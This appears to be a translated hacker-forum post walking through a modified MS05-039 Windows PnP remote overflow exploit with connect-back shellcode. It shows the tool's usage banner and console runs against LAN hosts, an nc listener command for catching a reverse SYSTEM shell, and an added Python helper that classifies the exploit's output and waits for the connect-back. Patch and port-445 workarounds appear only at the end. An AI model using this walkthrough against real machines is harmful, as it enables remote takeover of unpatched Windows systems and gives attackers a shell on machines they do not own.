Haven't been online for a few days, no idea what the brothers have been up to.....
The group is actually playing with overflows, sweat, and having a blast at it..... Remember back in the day when MS04011 plus the Serv_U overflow kept us entertained for ages.... and now...
E:\hacker>ms05039
                 MS05-039 Windows PnP Remote Overflow Exploit
                Connect back shellcode Edition By superlone[EST]
                        Tested On Windows 2000 PRO SP4 CN
        Usage:
                 ms05039 <host> <conIP> <conPort> [target]
        Options:
                 host    <--------> target IP or domain name
                 conIP   <--------> connect back IP
                 conPort <--------> connect back PORT
                 target  <--------> taget system TYPE default is 1
        Targets:
                 0   <--------> Universal jmp ebx address on EN System
                 1   <--------> Universal jmp ebx address on CN System
The foreign exploit's functionality wasn't up to much, so superlone[EST] rewrote its built-in shellcode as a connect-back (reverse) one, and it really is nice to use. I don't have a proper setup to test it and only tried it briefly: although the advisory for this vulnerability says XP SP2 is also affected, my tests against my own machine and Yun's machine both failed.... haha, could I be doing something wrong???
The following output means the crafted packet was never sent: the tool connects to TCP/445 but the SMB null session gets no response, so it never reaches the pipe bind step:
E:\hacker>ms05039 192.168.1.113 192.168.1.123 4567 1
                 MS05-039 Windows PnP Remote Overflow Exploit
                Connect back shellcode Edition By superlone[EST]
                        Tested On Windows 2000 PRO SP4 CN
[+] Trying to connect to remote port on192.168.1.113:445...ESTABLISHED
[+] Making null session...
[!] Failed to get responding data
E:\hacker>
The following output means the packet went out and the overflow may have succeeded (the tool only knows the send completed; whether the shellcode ran is decided by your listener):
E:\hacker>ms05039 192.168.1.112 192.168.1.123 4567 1
                 MS05-039 Windows PnP Remote Overflow Exploit
                Connect back shellcode Edition By superlone[EST]
                        Tested On Windows 2000 PRO SP4 CN
[+] Trying to connect to remote port on192.168.1.112:445...ESTABLISHED
[+] Making null session...OK
[+]Trying to bind pipe...OK
[*] Tring to send crafted packet...OK
[+]Exploit done!Check your reverse shell on 192.168.1.123:4567
E:\hacker>
Open a second CMD and listen on port 4567 with NC (pick whatever port you like, it just has to match conPort). Since the shellcode connects back to you, the listener has to be running before the exploit fires, or its connect() has nothing to reach:
E:\hacker>nc -l -p 4567
If it works, the lovely CMD shell prompt appears. Unfortunately it didn't work for me; according to the brothers' test results it is fairly reliable on 2000 SP4..... Brothers with spare time, go test it, and if you have a better way tell me, I may have gone wrong somewhere..... Later I saw what Wudi said: this vulnerability can be used both for remote overflow (only when the target is 2000 or XP SP1) and for local privilege escalation (2000 and everything above works). And after a successful overflow you get a SYSTEM-privilege shell.. Sweat, the machines I built on the dorm LAN are all XP SP2!
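The run-then-listen sequence above, written out as a small Python helper. This is an added example, not part of the original post and not superlone[EST]'s tool: it classifies the tool's console output by the two markers the post shows ("[!] Failed to get responding data" versus "Exploit done"), binds the connect-back port before anything is launched, and reports whether something actually connected within a timeout instead of leaving you staring at a blank nc window. demo() stands in for the exploit with a plain local TCP connection; the function names, the loopback simulation and the timeouts are assumptions of this example.

```python
import socket
import threading

# Sample output copied from the post's two runs of the ms05039 tool,
# embedded here as constructed input so the script runs offline.
OUTPUT_NOT_SENT = """\
[+] Trying to connect to remote port on192.168.1.113:445...ESTABLISHED
[+] Making null session...
[!] Failed to get responding data
"""

OUTPUT_SENT = """\
[+] Trying to connect to remote port on192.168.1.112:445...ESTABLISHED
[+] Making null session...OK
[+]Trying to bind pipe...OK
[*] Tring to send crafted packet...OK
[+]Exploit done!Check your reverse shell on 192.168.1.123:4567
"""


def classify_output(text):
    """Map the tool's console output to a verdict:
    'not_sent' - null session / pipe bind failed, no packet was sent
    'sent'     - crafted packet went out; only the listener can tell if it worked
    'unknown'  - neither marker present (bad args, crash, ...)
    The markers are exactly the strings the post shows the tool printing."""
    if "[!] Failed to get responding data" in text:
        return "not_sent"
    if "Exploit done" in text:
        return "sent"
    return "unknown"


def make_listener(port, host="0.0.0.0"):
    """Bind the connect-back port *before* the exploit is launched, otherwise
    the shellcode's connect() has nothing to reach. port=0 picks a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def wait_for_connect_back(srv, timeout):
    """Wait up to `timeout` seconds for the shellcode to connect back.
    Returns (conn, peer_address) or None if nothing arrived in time."""
    srv.settimeout(timeout)
    try:
        return srv.accept()
    except socket.timeout:
        return None


def simulated_connect_back(port):
    """Assumed stand-in for the connect-back shellcode: a plain TCP connect
    from loopback to our listener, so the flow can be exercised with no target."""
    return socket.create_connection(("127.0.0.1", port), timeout=5)


def demo(timeout=5.0):
    """Walk the full flow offline: listener up first, tool output classified,
    connect-back detected, timeout path shown. Returns a dict of results."""
    srv = make_listener(0, host="127.0.0.1")
    port = srv.getsockname()[1]
    results = {
        "port": port,
        "verdict_failed": classify_output(OUTPUT_NOT_SENT),
        "verdict_sent": classify_output(OUTPUT_SENT),
    }

    got = {}

    def waiter():
        got["r"] = wait_for_connect_back(srv, timeout)

    th = threading.Thread(target=waiter)
    th.start()

    # A 'not_sent' run never reaches the shellcode, so only a 'sent' run is
    # worth waiting on; here the "shellcode" is the loopback simulation.
    client = None
    if results["verdict_sent"] == "sent":
        client = simulated_connect_back(port)
    th.join()

    r = got.get("r")
    results["connected_back"] = r is not None
    results["peer"] = r[1][0] if r else None
    if r:
        r[0].close()
    if client:
        client.close()
    srv.close()

    # Timeout path: a listener nobody connects to reports None, which is what
    # you see when the packet was sent but the overflow did not land.
    idle = make_listener(0, host="127.0.0.1")
    results["idle_timed_out"] = wait_for_connect_back(idle, 0.2) is None
    idle.close()
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

On a real run you would keep the listener socket from make_listener() and hand the accepted connection to an interactive relay (or simply use nc as the post does); the point of the helper is that a "sent" verdict with no connect-back within the timeout is a clean, scriptable failure rather than a silent one.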
PS: Temporary workaround: close port 445 (SMB over TCP) and block all inbound connections to it at the firewall; the exploit cannot even start its null session without it.
The proper fix: install the MS05-039 update along with the latest patches....
For more details see the following links:
http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
http://www.eviloctal.com/forum/read.php?tid=13433